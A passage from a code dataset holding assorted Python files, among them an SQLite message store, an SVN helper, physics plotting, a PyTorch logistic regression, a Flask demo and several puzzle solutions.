qq_number=?, timestamp=? where tg_message_id=?;\",\n (qq_message_id, qq_number, timestamp, tg_message_id))\n else: # if not, create record\n self.cursor.execute(f\"insert into '{table_name}' (tg_message_id, qq_message_id, qq_number, timestamp)\"\n f\"values (?, ?, ?, ?)\",\n (tg_message_id, qq_message_id, qq_number, timestamp))\n self.conn.commit()\n\n def retrieve_message(self, tg_message_id: int,\n forward_index: int):\n \"\"\"\n get specific record\n :param tg_message_id:\n :param forward_index:\n :return:\n \"\"\"\n table_name = '_' + str(forward_index)\n self.cursor.execute(f\"select * from '{table_name}' where tg_message_id = ?\", (tg_message_id,))\n result = self.cursor.fetchall()\n if len(result):\n return result[0]\n else:\n return None\n\n def delete_message(self, tg_message_id: int,\n forward_index: int):\n \"\"\"\n delete record\n :param tg_message_id:\n :param forward_index:\n :return:\n \"\"\"\n table_name = '_' + str(forward_index)\n self.cursor.execute(f\"delete from {table_name} where tg_message_id=?;\", (tg_message_id,))\n self.conn.commit()\n\n def purge_message(self):\n \"\"\"\n delete outdated records\n :return:\n \"\"\"\n for idx, forward in enumerate(FORWARD_LIST):\n table_name = '_' + str(idx)\n purge_time = int(time.mktime((datetime.datetime.now() - datetime.timedelta(weeks=2)).timetuple()))\n self.cursor.execute(f\"delete from {table_name} where timestamp < ?;\", (purge_time,))\n self.conn.commit()\n\n def __del__(self):\n self.conn.close()\n","sub_path":"main/message_persistence.py","file_name":"message_persistence.py","file_ext":"py","file_size_in_byte":3786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"111467420","text":"import os\nimport re\nimport shlex\nfrom subprocess import *\n\n\ndef remove_file(p):\n print('remove {}'.format(p))\n os.remove(p)\n\n\ndef remove_dir(p):\n print('remove directory {}'.format(p))\n os.rmdir(p)\n\n\ndef remove_files(path):\n path = os.path.join(os.path.abspath('.'), path)\n if not os.path.isdir(path):\n remove_file(path)\n return\n files = os.listdir(path)\n for x in files:\n fullpath = os.path.join(path, x)\n if os.path.isfile(fullpath):\n remove_file(fullpath)\n elif os.path.isdir(fullpath):\n remove_files(fullpath)\n remove_dir(path)\n\n\ndef remove_unversioned_files(path):\n unversioned = re.compile('^ ?[\\?ID] *[1-9 ]*[a-zA-Z]* +(.*)')\n cmd = shlex.split('svn status')\n cmd.append(path)\n (out, err) = Popen(cmd, stdout=PIPE).communicate()\n for l in out.splitlines():\n match = unversioned.match(l)\n if match:\n remove_files(match.group(1))\n\n\ndef svn(cmd, path):\n cmd = shlex.split(cmd)\n cmd.append(path)\n Popen(cmd).communicate()\n \n\ndef revert(path):\n svn('svn revert -R', path)\n\n\ndef update(path):\n svn('svn update', path)\n\n\ndef checkout(path):\n svn('svn checkout', path)\n\n\ndef run(action, path):\n path = os.path.dirname(path)\n if action in ['up', 'update']:\n update(path)\n elif action == 'revert':\n revert(path)\n elif action == 'remove_unversioned_files':\n remove_unversioned_files(path)\n elif action in ['co', 'checkout']:\n checkout(path)\n else:\n raise Exception('[ERROR]: unknown actions')\n","sub_path":"plugins/svn.py","file_name":"svn.py","file_ext":"py","file_size_in_byte":1595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"70143244","text":"#!/usr/bin/env python\n\"\"\"\nPlot systematic uncertainty\n\"\"\"\n\n__author__ = \"Maoqiang JING \"\n__copyright__ = \"Copyright (c) Maoqiang JING\"\n__created__ = \"[2020-11-26 Thr 21:43]\"\n\nimport ROOT\nfrom ROOT import TCanvas, gStyle, TGraphErrors, TF1\nfrom ROOT import TFile, TH1F, TLegend, TPaveText\nfrom array import array\nimport sys, os\nimport logging\nfrom math import *\nlogging.basicConfig(level=logging.DEBUG, format=' %(asctime)s - %(levelname)s- %(message)s')\ngStyle.SetOptTitle(0)\ngStyle.SetOptTitle(0)\n\ndef usage():\n sys.stdout.write('''\nNAME\n plot_diff.py\n\nSYNOPSIS\n ./plot_diff.py\n\nAUTHOR\n Maoqiang JING \n\nDATE\n November 2020\n\\n''')\n\ndef set_pavetext(pt):\n pt.SetFillStyle(0)\n pt.SetBorderSize(0)\n pt.SetTextAlign(10)\n pt.SetTextSize(0.06)\n\ndef set_graph_style(gr, xtitle, ytitle):\n gr.GetXaxis().SetNdivisions(509)\n gr.GetYaxis().SetNdivisions(504)\n gr.SetLineWidth(2)\n gr.GetXaxis().SetTitleSize(0.06)\n gr.GetXaxis().SetTitleOffset(1.1)\n gr.GetXaxis().SetLabelOffset(0.01)\n gr.GetXaxis().SetLabelSize(0.05)\n gr.GetXaxis().SetRangeUser(4.17, 4.70)\n gr.GetYaxis().SetTitleSize(0.06)\n gr.GetYaxis().SetTitleOffset(0.9)\n gr.GetYaxis().SetLabelOffset(0.01)\n gr.GetYaxis().SetLabelSize(0.05)\n gr.GetXaxis().SetTitle(xtitle)\n gr.GetXaxis().CenterTitle()\n gr.GetYaxis().SetTitle(ytitle)\n gr.GetYaxis().CenterTitle()\n gr.SetMarkerColor(1)\n gr.SetMarkerStyle(21)\n\ndef set_canvas_style(mbc):\n mbc.SetFillColor(0)\n mbc.SetLeftMargin(0.15)\n mbc.SetRightMargin(0.15)\n mbc.SetTopMargin(0.1)\n mbc.SetBottomMargin(0.15)\n mbc.SetGrid()\n\ndef draw():\n N = 8\n ecms = array('f', N*[0])\n ecms_err = array('f', N*[0])\n factor = array('f', N*[0])\n factor_err = array('f', N*[0])\n path = './txts/sys_err_window_raw.txt'\n\n mbc = TCanvas('mbc', 'mbc', 800, 600)\n set_canvas_style(mbc)\n\n f = open(path, 'r')\n lines = f.readlines()\n count = 0\n sum_mean = 0\n sum_err = 0\n for line in lines:\n fargs = map(float, line.strip('\\n').strip().split())\n ecms[count] = fargs[0]\n ecms_err[count] = 0.0022\n factor[count] = fargs[1]\n factor_err[count] = fargs[2]\n sum_mean += fargs[1]\n sum_err += fargs[2]\n count += 1\n\n grerr = TGraphErrors(N, ecms, factor, ecms_err, factor_err)\n xtitle = 'E_{cms} (GeV)'\n ytitle = 'f^{RM(D^{+}#pi_{0}^{+}#pi_{0}^{-})}'\n set_graph_style(grerr, xtitle, ytitle)\n f = TF1('f', '[0]', ecms[0], ecms[1])\n grerr.Fit(f)\n chi2 = f.GetChisquare()\n ndf = f.GetNDF()\n F = f.GetParameter(0)\n F_err = f.GetParError(0)\n grerr.Draw('ap')\n\n pt = TPaveText(0.35, 0.65, 0.75, 0.85, \"BRNDC\")\n set_pavetext(pt)\n pt.Draw()\n line = 'f#pm#sigma_{f^{RM(D^{+}#pi_{0}^{+}#pi_{0}^{-})}} = ' + str(round(F, 3)) + '#pm' + str(round(F_err, 3))\n pt.AddText(line)\n line = '#chi^{2}/ndf = ' + str(round(chi2, 3)) + '/' + str(round(ndf, 3)) + ' = ' + str(round(chi2/ndf, 3))\n pt.AddText(line)\n line = '#Delta_{f^{RM(D^{+}#pi_{0}^{+}#pi_{0}^{-})}}/#sigma_{f^{RM(D^{+}#pi_{0}^{+}#pi_{0}^{-})}}=' + str(round((1 - F)/F_err, 3))\n pt.AddText(line)\n mbc.Update()\n\n if not os.path.exists('./figs/'):\n os.makedirs('./figs/')\n mbc.SaveAs('./figs/sys_err_window.pdf')\n\n if not os.path.exists('./txts/'):\n os.makedirs('./txts/')\n\n with open('./txts/f_rm_Dpipi.txt', 'w') as f_out:\n f_out.write(str(F) + '\\n')\n\n ecms = [4190, 4200, 4210, 4220, 4230, 4237, 4245, 4246, 4260, 4270, 4280, 4290, 4310, 4315, 4340, 4360, 4380, 4390, 4400, 4420, 4440, 4470, 4530, 4575, 4600, 4610, 4620, 4640, 4660, 4680, 4700, 4740, 4750, 4780, 4840, 4914, 4946]\n with open('./txts/sys_err_window.txt', 'w') as f_out:\n for ecm in ecms:\n out = str(ecm/1000.) + '\\t' + str(round(F_err*100, 1)) + '\\n'\n f_out.write(out)\n\n raw_input('Enter anything to end...')\n \nif __name__ == '__main__':\n draw()\n","sub_path":"python/sys_err/window/plot_diff.py","file_name":"plot_diff.py","file_ext":"py","file_size_in_byte":3994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"26235465","text":"__author__ = 'jbjose'\n\nimport sys, StringIO, math\nimport asciitree\n\n\"\"\"\nGiven a number, print a tree of its factors.\n\nhttp://www.reddit.com/r/dailyprogrammer/comments/284uhh/6142014_challenge_166b_intermediate_prime_factor/\n\"\"\"\n\nclass Node(object):\n def __init__(self, name, children):\n self.name = name\n self.children = children\n\n def __str__(self):\n return self.name\n\ndef is_prime(n):\n \"\"\"Trial division method: Tests primality by testing if n is divisible by a prime number from 2 to ceil(sqrt(n))\"\"\"\n # past ceil(sqrt(n)), the factors are the same\n for i in range(2,int(math.ceil(math.sqrt(n)))+1):\n if not n % i:\n return False\n return True\n\ndef get_factors(n):\n while not is_prime(n):\n for i in range(2,n):\n if not n % i:\n n = n/i\n yield i, n\n break\n yield n, None\n\nif __name__ == \"__main__\":\n sys.stdin = StringIO.StringIO(\"1767150\")\n n = int(sys.stdin.readline().strip())\n root = Node(str(n),[])\n current_node = root\n for x,y in get_factors(n):\n if y is not None:\n current_node.children = [Node(str(y),[]), Node(str(x),[])]\n current_node = current_node.children[0]\n print(asciitree.draw_tree(root))","sub_path":"166.Intermediate.PrimeFactorTree.py","file_name":"166.Intermediate.PrimeFactorTree.py","file_ext":"py","file_size_in_byte":1278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"58318133","text":"from flask import Flask,current_app,url_for\napp = Flask(__name__)\n@app.route('/')\ndef index():\n # 在视图函数内部可以直接访问current_app.name\n print(current_app.name) #context_demo\n return 'Hello World!'\n\n@app.route('/list/')\ndef my_list():\n return 'my_list'\n\n# 请求上下文\nwith app.test_request_context():\n # 手动推入一个请求上下文到请求上下文栈中\n # 如果当前应用上下文栈中没有应用上下文\n # 那么会首先推入一个应用上下文到栈中\n print(url_for('my_list'))\n\nif __name__ == '__main__':\n app.run(debug=True)\n","sub_path":"8/8-2/qingqiu/qingqiu02.py","file_name":"qingqiu02.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"26991890","text":"import torch\nfrom torch.nn import functional as f\n\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\n\ndef logistic_model(theta, x):\n a = torch.matmul(theta, x)\n return torch.sigmoid(a)\n\n\ndef get_loss(y_p, y_t):\n return -torch.mean(y_t * torch.log(y_p) + (1 - y_t) * torch.log(1 - y_p))\n\n\n# def getx(triplets, i):\n# x1_pre = torch.tensor([triplets[i][0]], device=device)\n# x1 = f.one_hot(x1_pre, 501)\n# x2_pre = torch.tensor([triplets[i][1]], device=device)\n# x2 = f.one_hot(x2_pre, 501)\n# x3_pre = torch.tensor([triplets[i][2]], device=device)\n# x3 = f.one_hot(x3_pre, 501)\n# return torch.cat([x1, x2, x3], 1).float().t()\n\n\ndef getlist(infopen):\n lines = infopen.readlines()\n triplets = []\n ys = []\n for line in lines:\n nums = line.split()\n triplets.append([int(nums[0]), int(nums[1]), int(nums[2])])\n ys.append(int(nums[-1]))\n return triplets, ys\n\n\ndef OneHotProcessing(infile1, infile2, infile3, outfile):\n theta = torch.zeros(1, 501 * 3, device=device)\n infopen1 = open(infile1, 'r', encoding='utf-8')\n infopen2 = open(infile2, 'r', encoding='utf-8')\n infopen3 = open(infile3, 'r', encoding='utf-8')\n outfopen = open(outfile, 'w', encoding='utf-8')\n # lines = infopen1.readlines()\n # triplets_train = []\n # ys_train = []\n # for line in lines:\n # nums = line.split()\n # triplets_train.append([int(nums[0]), int(nums[1]), int(nums[2])])\n # ys_train.append(int(nums[-1]))\n # lines = infopen2.readlines()\n # triplets_verification = []\n # ys_verification = []\n # for line in lines:\n # nums = line.split()\n # triplets_verification.append([int(nums[0]), int(nums[1]), int(nums[2])])\n # ys_verification.append(int(nums[-1]))\n\n triplets_train, ys_train = getlist(infopen1)\n triplets_verification, ys_verification = getlist(infopen2)\n triplets_test, ys_test = getlist(infopen3)\n print(\"read in completed\")\n\n alpha = 0.02\n batch_size = 5000\n f1_list = []\n for e in range(100):\n for i in range(0, len(triplets_train), batch_size):\n x = torch.tensor(triplets_train[i:i + batch_size], device=device)\n length = len(triplets_train[i:i + batch_size])\n # print(x.size())\n x = f.one_hot(x, 501).float().reshape(length, 501 * 3).t()\n # print('x.size()=', x.size())\n # print('theta.size()=', theta.size())\n y_p = logistic_model(theta, x)\n # print(y_p)\n # print('y_p.size()=', y_p.size())\n y = torch.tensor(ys_train[i:i + batch_size], device=device)\n # print(y)\n # print('y.size()=', y.size())\n loss = torch.matmul((y_p - y), x.t())\n # print(loss)\n theta.data = theta.data - alpha * loss.data\n # print(theta.size())\n # print(theta)\n\n # 验证集验证模型可信度\n true_predictions = 0 # 预测1正确\n one_predictions = 0 # 预测1的个数\n true_original = 0 # 原有1的个数\n\n # i = random.randint(0, len(triplets_train) - 1)\n x = torch.tensor(triplets_verification, device=device)\n length = len(triplets_verification)\n x = f.one_hot(x, 501).float().reshape(length, 501 * 3).t()\n y_p = logistic_model(theta, x).cpu().numpy().tolist()\n # print(y_p)\n # print(y.size())\n for i in range(len(triplets_verification)):\n if (y_p[0][i] >= 0.5) and (ys_verification[i] == 1):\n true_predictions += 1\n if y_p[0][i] >= 0.5:\n one_predictions += 1\n if ys_verification[i] == 1:\n true_original += 1\n\n recall_rate = float(true_predictions) / float(true_original)\n precision_rate = float(true_predictions) / float(one_predictions)\n if recall_rate != 0 or precision_rate != 0:\n f1_measure = 2 * (recall_rate * precision_rate) / (recall_rate + precision_rate)\n else:\n f1_measure = 0.0\n\n f1_list.append([e, f1_measure])\n\n if e % 10 == 0:\n print(str(e) + ':')\n print(\"recall rate:\", recall_rate)\n print(\"precision_rate:\", precision_rate)\n print(\"f1 measure:\", f1_measure)\n for list in f1_list:\n outfopen.write(str(list[0]+1) + ' ' + str(list[1]) + '\\n')\n\n # 测试集测试模型训练效果\n true_predictions = 0 # 预测1正确\n one_predictions = 0 # 预测1的个数\n true_original = 0 # 原有1的个数\n\n # i = random.randint(0, len(triplets_train) - 1)\n x = torch.tensor(triplets_test, device=device)\n length = len(triplets_test)\n x = f.one_hot(x, 501).float().reshape(length, 501 * 3).t()\n y_p = logistic_model(theta, x).cpu().numpy().tolist()\n # print(y_p)\n # print(y.size())\n for i in range(len(triplets_test)):\n if (y_p[0][i] >= 0.5) and (ys_test[i] == 1):\n true_predictions += 1\n if y_p[0][i] >= 0.5:\n one_predictions += 1\n if ys_test[i] == 1:\n true_original += 1\n\n print(\"In test set:\")\n recall_rate = float(true_predictions) / float(true_original)\n print(\"recall rate:\", recall_rate)\n precision_rate = float(true_predictions) / float(one_predictions)\n print(\"precision_rate:\", precision_rate)\n if recall_rate != 0 or precision_rate != 0:\n f1_measure = 2 * (recall_rate * precision_rate) / (recall_rate + precision_rate)\n else:\n f1_measure = 0.0\n print(\"f1 measure:\", f1_measure)\n\n infopen1.close()\n infopen2.close()\n infopen3.close()\n outfopen.close()\n\n\nif __name__ == '__main__':\n OneHotProcessing(\"./sets/pre_onehot_train_set.txt\",\n \"./sets/pre_onehot_verification_set.txt\",\n \"./sets/pre_onehot_test_set.txt\",\n \"./sets/verification_out1.txt\")\n","sub_path":"OneHotProcessing.py","file_name":"OneHotProcessing.py","file_ext":"py","file_size_in_byte":5902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"160703041","text":"import torch\nimport torch.nn as nn\nfrom Models import Classifier as C\nfrom data import data_loader\n\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\nlatent_size = 64 # size of noise input to generator\nhidden_size = 256\nimage_size = 784\nnum_epochs = 2000\n\nC = C().to(device)\n\ncriterion = nn.NLLLoss()\nc_optimizer = torch.optim.Adam(C.parameters(), lr=0.0002)\n\n\nfor epoch in range(num_epochs):\n print('Epoch: ', epoch)\n for i, (images, labels) in enumerate(data_loader):\n images = images.to(device)\n labels = labels.to(device)\n\n outputs = C(images)\n loss = criterion(outputs, labels)\n score = outputs\n\n c_optimizer.zero_grad()\n loss.backward()\n c_optimizer.step()\n\n if i % 100 == 0:\n result = 'Epoch: {}/{} loss: {} score: {}'.format(epoch, num_epochs, loss.item(), score.mean())\n print(result)\n torch.save(C.state_dict(), 'C{}.ckpt'.format(epoch))\n\n","sub_path":"gansWorking/classfier/classifier.py","file_name":"classifier.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"136044985","text":"# http://blog.amelieff.jp/?eid=231191\nimport os, shutil, glob\n\ncdir = os.getcwd()\ndata_dir = '/Users/petadimensionlab/Downloads/test01'\n#prefetch_dir = '/Users/snakaoka/ws/apps/sratoolkit/bin/'\nprefetch_dir = '/Users/petadimensionlab/ws/apps/pfastq_dump/bin/'\nDL_dir = '/Users/petadimensionlab/ncbi/public/sra/'\n\n## convert sra to fastq ##\nos.chdir(data_dir)\ncmd = prefetch_dir+'./prefetch --option-file '+os.path.join(data_dir,'SRR_Acc_List.txt')\nos.system(cmd)\nos.chdir(cdir)\n\n## move all data to an assigned folder ##\nos.chdir(DL_dir)\nfiles = glob.glob('*.sra')\nfor f in files:\n tmp = os.path.join(data_dir,f)\n shutil.move(f,tmp)\n\n ","sub_path":"exec_DLSSRs.py","file_name":"exec_DLSSRs.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"630371717","text":"\"\"\" Advent Of Code 2017 : 24 \"\"\"\n\nf = open('input.txt', 'r')\n_input = f.read().rstrip()\nf.close()\nlines = _input.split('\\n')\ncomponents = []\nfor line in lines:\n components.append(tuple([int(x) for x in line.split('/')]))\nmaxStrength = 0\nmaxLen = 0\nbridges = []\n# =====================================================================\n\n\ndef findNextComponent(port, components):\n for c in components:\n if port in c:\n return c\n return None\n# ---------------------\n\n\ndef getOtherPort(port, component):\n if port == component[0]:\n return component[1]\n else:\n return component[0]\n# ---------------------\n\n\ndef crawl(port, components, strength, length):\n global maxStrength, maxLen, bridges\n for c in components:\n if port in c:\n myComponents = components[:]\n myComponents.remove(c)\n curStr = strength + c[0] + c[1]\n other = getOtherPort(port, c)\n crawl(other, myComponents, curStr, length + 1)\n\n maxStrength = max(strength, maxStrength)\n maxLen = max(length, maxLen)\n bridges.append(tuple([length, strength]))\n return True\n# ---------------------\n\n\ndef main():\n crawl(0, components, 0, 0)\n print('Part 1:', maxStrength)\n maxBridgeLength = [x[1] for x in bridges if x[0] == maxLen]\n print('Part 2:', max(maxBridgeLength))\n# =====================================================================\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"aoc17/24/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"414061031","text":"\nimport sys\nimport math\nimport csv\nimport matplotlib.pyplot as plt\n\nif __name__ == '__main__':\n question = sys.argv[1]\n\n if question == '2.ab':\n # Question 2.a\n file = open('rs_1.csv')\n csv_reader = csv.reader(file)\n\n rows = []\n for row in csv_reader:\n rows.append(row[0])\n\n result = []\n rain = no_rain = 0.0\n temp = 0\n\n for i in range(1, len(rows)):\n if rows[i] == '1':\n rain += 1.0\n temp = (rain / (rain + no_rain))\n elif rows[i] == '2':\n no_rain += 1.0\n temp = (rain / (rain + no_rain))\n result.append(temp)\n\n # print('P(r | s,w) = {0}'.format(result[-1]))\n plt.plot(result)\n plt.xlabel('Number of Samples')\n plt.ylabel('P(r | s,w)')\n plt.xscale('log')\n plt.ylim([0, 0.40])\n plt.savefig('a.png')\n\n # Question 2.b\n result_plus_epsilon = []\n result_minus_epsilon = []\n rain = no_rain = 0.0\n temp1 = temp2 = 0.0\n n = 0.0\n\n for i in range(1, len(rows)):\n if rows[i] == '1':\n rain += 1.0\n n += 1.0\n epsilon = math.sqrt(-(math.log(0.05/2))/(2*n))\n temp1 = (rain / (rain + no_rain)) + epsilon\n temp2 = (rain / (rain + no_rain)) - epsilon\n elif rows[i] == '2':\n no_rain += 1.0\n n += 1.0\n epsilon = math.sqrt(-(math.log(0.05 / 2)) / (2 * n))\n temp1 = (rain / (rain + no_rain)) + epsilon\n temp2 = (rain / (rain + no_rain)) - epsilon\n result_plus_epsilon.append(temp1)\n result_minus_epsilon.append(temp2)\n\n plt.plot(result_plus_epsilon)\n plt.plot(result_minus_epsilon)\n plt.ylim([-0.20, 0.70])\n plt.savefig('b.png')\n\n elif question == '2.c':\n # Question 2.a\n file = open('lw_1.csv')\n csv_reader = csv.reader(file)\n\n rows = []\n for row in csv_reader:\n rows.append(row)\n\n result = [0]\n rain = no_rain = 0.0\n temp_rain = temp_no_rain = 0.0\n temp = 0\n\n for i in range(len(rows)):\n if rows[i][0] == '1':\n rain += 1.0\n temp_rain += float(rows[i][1])\n temp = (temp_rain / (temp_rain + temp_no_rain))\n elif rows[i][0] == '2':\n no_rain += 1.0\n temp_no_rain += float(rows[i][1])\n temp = (temp_rain / (temp_rain + temp_no_rain))\n result.append(temp)\n\n print('P(r | s,w) = {0}'.format(result[-1]))\n print('rain: {0}'.format(rain))\n print('no rain: {0}'.format(no_rain))\n print('total: {0}'.format(rain + no_rain))\n plt.plot(result)\n plt.xlabel('Number of Samples')\n plt.ylabel('P(r | s,w)')\n plt.xscale('log')\n plt.ylim([0, 0.70])\n plt.savefig('c.png')\n else:\n print('Invalid question number')\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"44830856","text":"# class Solution(object):\n# def findMedianSortedArrays(self, nums1, nums2):\n# \"\"\"\n# :type nums1: List[int]\n# :type nums2: List[int]\n# :rtype: float\n# \"\"\"\n# i=j=0\n# res = []\n# while i < len(nums1) and j < len(nums2):\n# if nums1[i] < nums2[j]:\n# res.append(nums1[i])\n# i += 1\n# else:\n# res.append(nums2[j])\n# j += 1\n# if i == len(nums1):\n# res.extend(nums2[j:])\n# if j == len(nums2):\n# res.extend(nums1[i:])\n# k = len(res)\n# if k % 2 == 0: \n# return (res[k/2-1] + res[k/2]) / 2.\n# else:\n# return res[k // 2]\n\n# O(log(min(m,n))\nclass Solution(object):\n def findMedianSortedArrays(self, nums1, nums2):\n \"\"\"\n :type nums1: List[int]\n :type nums2: List[int]\n :rtype: float\n \"\"\"\n A,B = nums1,nums2\n m,n=len(A),len(B)\n if m > n:\n A, B, m, n = B, A, n, m\n if n == 0:\n raise ValueError\n \n imin, imax, half_len = 0, m, (m+n+1) / 2\n while imin<=imax:\n i = (imin+imax) / 2\n j = half_len - i\n if i < m and A[i] < B[j-1]:\n imin = i + 1\n elif i > 0 and A[i-1] > B[j]:\n imax = i - 1\n else:\n # i is perfect\n if i == 0: max_of_left = B[j-1]\n elif j == 0: max_of_left = A[i-1]\n else: max_of_left = max(A[i-1], B[j-1])\n\n if (m + n) % 2 == 1:\n return max_of_left\n\n if i == m: min_of_right = B[j]\n elif j == n: min_of_right = A[i]\n else: min_of_right = min(A[i], B[j])\n\n return (max_of_left + min_of_right) / 2.0 ","sub_path":"leetcode/4_Median of Two Sorted Arrays.py","file_name":"4_Median of Two Sorted Arrays.py","file_ext":"py","file_size_in_byte":1894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"620525665","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\"\"\"\nCreated on 16/07/09 22:12:33\n\n@author: Changzhi Sun\n\"\"\"\nimport os\nfrom my_package.sentence import Sentence\nfrom my_package.static import Static\n\n\ndef clean(filename):\n complex_set = set()\n with open(filename, \"r\", encoding=\"utf8\") as f:\n for line in f:\n word = line.strip()\n tokens = word.split(' ')\n if tokens[0] in Static.BE:\n continue\n if len(tokens) > 10 or len(tokens) == 1:\n continue\n if Sentence.is_weak_opinwd(word):\n continue\n complex_set.add(word)\n return complex_set\n\nif __name__ == \"__main__\":\n domains = [ \"reviews_Cell_Phones_and_Accessories\",\n \"reviews_Movies_and_TV\",\n \"reviews_Grocery_and_Gourmet_Food\",\n \"reviews_Pet_Supplies\"]\n for domain in domains:\n domain_dir = os.path.join(os.getenv(\"OPIE_DIR\"), \"data/domains\", domain)\n complex_dir = os.path.join(domain_dir, \"complex\")\n candidate_raw_dir = os.path.join(complex_dir, \"candidate_raw\")\n threshold = [\"0.5\", \"0.8\"]\n train_dev = [\"train\", \"test\"]\n for d in train_dev:\n for t in threshold:\n f = open(os.path.join(complex_dir, \"candidate_clean\", \"%s-complex.%s\" % (t, d)), \"w\", encoding=\"utf8\")\n for e in clean(os.path.join(candidate_raw_dir, \"%s-step3000.%s\" % (t, d))):\n print(e, file=f)\n f.close()\n","sub_path":"src/my_package/complex/clean_candidate_complex.py","file_name":"clean_candidate_complex.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"92357713","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jul 25 18:13:03 2018\n\n@author: hamdymostafa\n\"\"\"\n\n## helper functions:\nimport numpy as np\n\ndef initialize_parameters(X):\n '''\n input: training features data \n output: parameters initialized with zeros\n '''\n w = np.zeros((X.shape[0],1))\n return w\n\ndef sigmoid(z):\n \"\"\"\n input: a scalar or an array\n ouptut: probability using sigmoid function\n \"\"\"\n s = 1/(1+np.exp(-z)) \n return s\n\ndef propagate(X,Y,w):\n '''\n input: weights and training data\n output: cost, dw (dj/dw)\n '''\n # FORWARD PROPAGATION (FROM X TO COST)\n\n Z = w.T@X\n A = sigmoid(Z) # activation function)\n A = A.T # transpose to a column vector\n \n m = X.shape[1]\n J = (-1/m)* np.sum(Y*np.log(A) + (1.-Y)*np.log(1.-A)) \n \n # BACKWARD PROPAGATION (TO FIND GRAD)\n dw = (1/m)* (X@(A-Y))\n \n return dw, J\n\n \ndef optimize(X, Y, w, learning_rate, num_iterations,print_cost = False ):\n \"\"\"\n input: training data, weights, learning rate, number of iterations\n output: parameters (after learning)\n \"\"\"\n costs = [] # I will accumelate the cost to see the behavior of the model! \n for i in range(num_iterations):\n dw, J = propagate(X,Y,w)\n w -= learning_rate*dw\n \n if i % 100 == 0:\n costs.append(J)\n \n \n # Print the cost every 100 training iterations\n if print_cost and i % 100 == 0:\n print (\"Cost after iteration %i: %f\" %(i, J))\n\n return w,costs\n\n\ndef predict(X,w):\n '''\n input: testing data (just features) , parameters\n output: all predictions (0/1)\n '''\n Z = w.T@X\n A = sigmoid(Z) \n A = A.T\n Y_prediction = (A > 0.5).astype(int)\n \n return Y_prediction\n\n\n\n\ndef model(X_train, Y_train, num_iterations = 2000, learning_rate = 0.5,print_cost = False):\n '''\n input: training data , number of iterations, learning rate\n ouput: model inforamtion (parameters)\n '''\n \n # initialize parameters with zeros \n w = initialize_parameters(X_train)\n \n # propagate (compute loss , gradient) & learning (update gradient)\n w,costs = optimize(X_train, Y_train , w, learning_rate, num_iterations )\n \n \n return w,costs","sub_path":"logistic_regression.py","file_name":"logistic_regression.py","file_ext":"py","file_size_in_byte":2263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"62458813","text":"from games.scopa import Card, Hand\nfrom random import *\n\n\nclass Deck:\n def __init__(self):\n self.cards = []\n for x in range(4):\n for y in range(10):\n self.cards.append(Card.Card(x, y))\n\n def __str__(self) -> str:\n s = \"\"\n for x in range(1, len(self.cards) + 1):\n s += \" \" * x + str(self.cards[x - 1]) + \"\\n\"\n return s\n\n def deal(self, hand: Hand):\n for y in range(4):\n hand.plate.append(self.cards.pop())\n self.pick(hand)\n\n def isempty(self) -> bool:\n if len(self.cards) == 0:\n return True\n return False\n\n def pick(self, hand: Hand):\n x = hand.players.head\n for i in range(hand.players.length):\n if x.number == hand.number:\n break\n x = x.following\n for z in range(3):\n for i in range(hand.players.length):\n x.value.addcard(self.cards.pop())\n x = x.following\n\n def shuffle(self):\n x = len(self.cards)\n for y in range(x):\n z = randint(y, x - 1)\n self.cards[y], self.cards[z] = self.cards[z], self.cards[y]\n","sub_path":"games/scopa/Deck.py","file_name":"Deck.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"349220790","text":"dungeon = [[100]]\n\n\ndef calculateMinimumHP(dungeon):\n m = len(dungeon)\n n = len(dungeon[0])\n dungeon[m - 1][n - 1] = min(0, dungeon[m - 1][n - 1])\n\n for i in range(m - 2, -1, -1):\n dungeon[i][-1] = min(0, (dungeon[i + 1][-1] + dungeon[i][-1]))\n\n for j in range(n - 2, -1, -1):\n dungeon[-1][j] = min(0, (dungeon[-1][j + 1] + dungeon[-1][j]))\n\n for i in range(m - 2, -1, -1):\n for j in range(n - 2, -1, -1):\n dungeon[i][j] = min(0, dungeon[i][j] +\n max(dungeon[i + 1][j], dungeon[i][j + 1]))\n\n return 1 - dungeon[0][0]\n\n\nprint(calculateMinimumHP(dungeon))\n","sub_path":"leetcode/60-100/67.py","file_name":"67.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"55532820","text":"import pytest\nfrom qcore.asserts import AssertRaises, assert_eq\n\nfrom tabml import feature_config_helper\nfrom tabml.utils.pb_helpers import parse_feature_config_pb\nfrom tabml.utils.utils import write_str_to_file\n\n\nclass 